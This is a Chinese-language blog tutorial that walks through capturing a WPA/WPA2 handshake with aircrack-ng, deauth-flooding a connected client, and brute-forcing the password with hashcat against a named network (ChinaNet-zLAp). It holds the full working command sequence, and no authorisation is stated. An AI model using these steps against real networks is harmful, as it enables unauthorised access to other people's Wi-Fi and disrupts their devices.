Kali Aircrack-NG HashCat 破解Wi-Fi密码

Kali Aircrack-NG HashCat 破解Wi-Fi密码

假日无事,某网站购入TL-WN722N Kali免驱网卡,扫描一下附近网络试试
仅学习使用

1.设备概要

2.破解WPA/WPA2类WI-FI操作(Root下操作):

用Parallels Desktop 安装Kali Linux,并且接入无线网卡

2.1查看可用无线网卡

airmon-ng

在这里插入图片描述

2.2启用网卡监听模式

airmon-ng start wlan0

使用iwconfig确认已经开启网卡监听模式,主要表现是,网卡名称wlan0变为wlan0mon, Mode:Monitor

在这里插入图片描述

2.3扫描周围Wi-Fi

airodump-ng wlan0mon

BSSID -- Wi-Fi的Mac地址 PWR -- 信号强度 Data -- 监听期间流量总和 CH -- WI-FI所用信道 ENC -- 加密算法 ESSID -- Wi-Fi名称

  • 看到需要破解的WI-FI按下Ctrl +C 终止
    我们的目标名是 ChinaNet-zLAp BSSID : 8C:53:C3:DA:77:F7 CH : 6

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EGjssNUT-1652855895563)(https://s3-us-west-2.amazonaws.com/secure.notion-static.com/a16223c7-251a-4e00-9911-e0ff3d6cb24b/Untitled.png)]

2.4抓取握手包并保存为CAP文件

airodump-ng --bssid 8C:53:C3:DA:77:F7 -c 6 -w /root/ChinaNet-zLAp wlan0mon
# -bssid 指定要破解的WI-FI BSSID 值
# -c 指定要破解的Wi-Fi的信道
# -w 捕获到的握手包文件名

在这里插入图片描述

2.5 主动对设备断网获取握手包

上一步中我们是被动等待
(以前我没有kali linux以及网卡的时候,MacBook就一直挂着等待很久很久~~)

但对于上面已经连上Wi-Fi的设备,我们可以使用aireplay-ng 进行deauth洪水攻击使其设备掉线,掉线的设备会自动重新连上Wi-Fi,此时我们就可以获得握手包

保持上步抓包命令不中断,新开一个窗口执行(我们选取信号最好的 PWR = -12 ):

aireplay-ng -0 10 -a 8C:53:C3:DA:77:F7 -c 28:6C:07:29:D9:A2 wlan0mon
# -0 表示断开设备连接
# 10 表示deauth攻击次数
# -a 为Wi-Fi的BSSID
# -c 表示让连接设备失效的设备BSSID地址,为上图中STATION地址

在这里插入图片描述

上图为洪水攻击过程(攻击过程十分明显,因为我连网的智能台灯熄灭重启了)

如图所示,我们已经抓到了重新认证的 28:6C:07:29:D9:A2 的握手包,使用Ctrl +C终止抓包

在这里插入图片描述

此时会在指定目录下产生文件(每次抓包后会产生一组,留意数字为第几次执行的)

在这里插入图片描述

3.暴力破解CAP文件

字典配合Aircrack-ng效率有点低(CPU破解),所以我们使用HashCat(GPU)破解WPA/WPA2的握手包

由于HashCat无法直接破解CAP文件,所以我们得将其转化为HCCAPX文件

去官网转换,https://hashcat.net/cap2hccapx/ 如图

在这里插入图片描述

或者使用工具(hashcat-utils的cap2hccapx):

下载地址:https://github.com/hashcat/hashcat-utils/releases/

cd hashcat-utils-1.9/bin && chmod +x cap2hccapx.bin

将CAP文件转化为HCCAPX文件:

在这里插入图片描述

  • 因为抓包了好几次,所以这里出现3个,只要有其中的一个就可以了,如果没有,那就是抓包失败了

3.1使用HashCat破解

  • 找了一台有独显的笔记本,MacBook核显计算??..
hashcat -a 3 -m 2500 ChinaNet-zLAp-01.hccapx "?d?d?d?d?d?d?d?d?d?d"
# -a attack_mode [ 0 Straight(字典破解) 1 Combination(组合破解) 3 Brute-force(掩码暴力破解)]
# -m 2500 破解WPA2 hccapx文件
#'?d' 一个'?d'表示一个数字,我这里是10位数数字密码,常用掩码类型如下:
# ? | Charset
#  ===+=========
#   l | abcdefghijklmnopqrstuvwxyz
#   u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
#   d | 0123456789
#   h | 0123456789abcdef
#   H | 0123456789ABCDEF
#   s |  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
#   a | ?l?u?d?s

按下**’s’**了解最新破解信息(Wi-Fi是10位数数字密码,GTX 850M 最久需要两天。。)

在这里插入图片描述
过了很久,密码破解成功,如图:
在这里插入图片描述

  • 6
    点赞
  • 53
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值